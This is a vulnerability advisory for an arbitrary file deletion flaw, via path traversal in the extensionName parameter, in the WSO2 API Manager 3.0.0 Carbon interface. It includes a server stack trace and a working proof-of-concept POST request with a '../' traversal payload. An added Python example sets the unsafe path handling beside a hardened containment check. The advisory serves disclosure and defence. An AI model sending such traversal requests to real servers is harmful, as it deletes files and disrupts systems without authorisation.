Document Title:
===============
WSO2 API Manager (Delete Extension) Arbitrary File Delete (Path Traversal)

##CVE not assigned yet
##Author : Raki Ben Hamouda
##Security Update : https://apim.docs.wso2.com/en/latest/

Common Vulnerability Scoring System:
====================================
8.5

Affected Product(s):
====================
WSO2 API Manager Carbon Interface

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A remote arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon management UI. An authenticated remote attacker with a low-privileged account can issue application requests that delete arbitrary files on the server's file system.

The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` module, in the `extensionName` parameter that names the extension to be deleted. The parameter value is passed on to the registry extension removal service without being restricted to the extensions directory, so an authenticated POST request whose `extensionName` contains path traversal sequences (`../`) makes the server delete any file the Carbon process has write access to, for example configuration files or database (.db) files.

The security risk of the arbitrary file delete vulnerability is rated High with a CVSS (Common Vulnerability Scoring System) score of 8.5. Exploitation of the path traversal vulnerability requires a low-privileged web-application user account with access to the Extensions component and no user interaction. Successful exploitation results in loss of availability, integrity and confidentiality.

===============================
Error generated by the server when the file is not found, taken from the log file (this is what brought it to my attention):

[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension.
org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\commons-dir
        at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.java:531) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.apache.axis2.description.OutInAxisOperationClient.handleResponse(OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisOperation.java:457) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(OutInAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.apache.axis2.client.OperationClient.execute(OperationClient.java:149) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.removeExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.extensions.stub_4.7.13.jar:?]
        at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extensions.ui_4.7.13.jar:?]
        at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspService(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]
        at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [tomcat_9.0.22.wso2v1.jar:?]

* Error displayed in the web browser with the request body:

=============================
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp

Vulnerable Parameter(s):
[+] extensionName

Server Version:
[+] 3.0.0

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by a remote attacker with a low-privileged web-application user account and no user interaction. For a security demonstration, or to reproduce the vulnerability, follow the information and steps below.

1. The attacker must have access to the Extensions component (List, Add, Delete extensions).
2. The attacker uploads any file with a .jar extension.
3. The attacker intercepts the delete request that follows and replaces the `extensionName` parameter with a traversal string.

--- PoC Session Logs [POST] ---
POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1
Host: localhost:9443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS
Content-Length: 22
Origin: https://localhost:9443
Connection: close
Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu
Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions
Pragma: no-cache
Cache-Control: no-cache

extensionName=../../../../INSTALL.txt

---------------Returned Headers in Response------------------
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Length: 10
Date: Sat, 04 Jan 2020 00:55:38 GMT
Connection: close
Server: WSO2 Carbon Server
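The following is an added example written for this page; it is not WSO2's code and does not reproduce the vendor's deleteExtension implementation. It reconstructs the unsafe pattern the advisory describes (the user-supplied extension name joined onto the extensions directory with no containment check) and places the hardened form beside it: accept only a bare file name, canonicalise the result, and refuse anything that does not stay strictly inside `repository/deployment/server/registryextensions`. The directory layout comes from the path in the stack trace above; the function names, the throw-away CARBON_HOME and the sample files are assumptions made for the demonstration. With the advisory's own payload, four `../` segments from the extensions directory land exactly on `CARBON_HOME/INSTALL.txt`, which is what the demo confirms.

```python
import os
import tempfile
from pathlib import Path

# Relative location of the registry extensions directory under CARBON_HOME,
# taken from the path shown in the advisory's stack trace.
EXT_DIR_REL = os.path.join("repository", "deployment", "server", "registryextensions")


def vulnerable_extension_path(carbon_home: str, extension_name: str) -> str:
    """Reconstruction of the unsafe behaviour described in the advisory
    (an assumption for this example, not WSO2's source): the user-controlled
    name is joined onto the extensions directory with no validation, so
    '../' segments in extensionName walk out of it and the caller deletes
    whatever path they reach."""
    return os.path.normpath(os.path.join(carbon_home, EXT_DIR_REL, extension_name))


def safe_extension_path(carbon_home: str, extension_name: str) -> str:
    """Hardened form: accept only a bare file name, then confirm the
    canonicalised target is still strictly inside the extensions directory.
    Raises ValueError for traversal, absolute paths, backslash variants,
    empty or dot names, and symlinked entries that resolve outside."""
    if (not extension_name or extension_name in (".", "..")
            or "/" in extension_name or "\\" in extension_name
            or "\x00" in extension_name):
        raise ValueError("extension name must be a bare file name: %r" % extension_name)
    ext_dir = Path(carbon_home, EXT_DIR_REL).resolve()
    target = (ext_dir / extension_name).resolve()
    # Path.parents excludes the path itself, so target == ext_dir is rejected too.
    if ext_dir not in target.parents:
        raise ValueError("refusing to touch a path outside %s: %s" % (ext_dir, target))
    return str(target)


def rejects(carbon_home: str, extension_name: str) -> bool:
    """True when the hardened resolver refuses the supplied name."""
    try:
        safe_extension_path(carbon_home, extension_name)
    except ValueError:
        return True
    return False


def delete_extension(carbon_home: str, extension_name: str) -> str:
    """Delete an extension through the hardened resolver; returns the path removed."""
    target = safe_extension_path(carbon_home, extension_name)
    os.remove(target)
    return target


def demo() -> dict:
    """Build a throw-away CARBON_HOME with constructed sample files and show
    that the vulnerable resolver escapes with the advisory's payload, while
    the hardened one rejects it yet still deletes a legitimate extension."""
    with tempfile.TemporaryDirectory() as home:
        ext_dir = os.path.join(home, EXT_DIR_REL)
        os.makedirs(ext_dir)
        install_txt = os.path.join(home, "INSTALL.txt")
        Path(install_txt).write_text("constructed sample file\n")
        Path(ext_dir, "my-ext.jar").write_bytes(b"PK\x03\x04")  # constructed stand-in jar

        payload = "../../../../INSTALL.txt"  # the advisory's PoC value
        results = {
            "vulnerable_escapes": os.path.realpath(vulnerable_extension_path(home, payload))
            == os.path.realpath(install_txt),
            "safe_rejects_traversal": rejects(home, payload),
            "safe_deletes_legit": False,
        }
        removed = delete_extension(home, "my-ext.jar")
        results["safe_deletes_legit"] = not os.path.exists(removed)
        return results


if __name__ == "__main__":
    print(demo())
```

The containment check is done on the resolved path rather than by string-matching `..`, so URL-decoded, doubled or backslash-separated variants are caught by the same rule, and an entry inside the extensions directory that is a symlink to somewhere else is refused as well; that is deliberately conservative for a delete operation.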